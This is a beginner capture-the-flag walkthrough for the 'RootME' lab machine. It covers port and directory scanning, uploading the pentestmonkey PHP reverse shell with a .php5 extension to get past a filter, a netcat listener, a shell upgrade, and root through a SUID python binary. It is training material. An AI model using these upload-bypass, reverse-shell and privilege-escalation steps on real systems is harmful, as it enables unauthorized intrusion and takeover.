🟒RootME

A ctf for beginners, can you root me?

Questions

  • Scan the machine, how many ports are open?

  • What version of Apache are running?

  • What is the hidden directory?

  • user.txt?

  • Search for files with SUID permission, which file is weird?

  • root.txt?

Enumeration

Nmap

nmap -sSVC -A -O -vv

Q: Scan the machine, how many ports are open?

A: 2

Q: What version of Apache are running?

A: 2.4.29

Q: What service is running on port 22?

A: ssh

finding Directories/files

gobuster dir -u http://10.10.63.255:80/arrow-up-right -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the ip is different because I continued that writeup the other day)

Q: What is the hidden directory?

A: /panel/

checking the directory /panel/, we have

imagearrow-up-right

let's try to upload a shell

shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.phparrow-up-right

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.phparrow-up-right -o revs.php

remember to set a port to listening

nc -lvp PORT

imagearrow-up-right

"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

mv revs.php revs.php5

imagearrow-up-right

it worked

to run click on "veja" ("see")

it worked, we have shell

to get a tty

python -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg

export TERM=xterm

image

user.txt

finding

find / -type f -name user.txt 2>/dev/null

imagearrow-up-right

getting

cat /var/www/user.txt

imagearrow-up-right

root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

find / -type f -user root -perm -4000 2>/dev/null

Exploring python set uid capabilities

python -c "import os;os.setuid(0);os.system('/bin/bash')"

getting

Last updated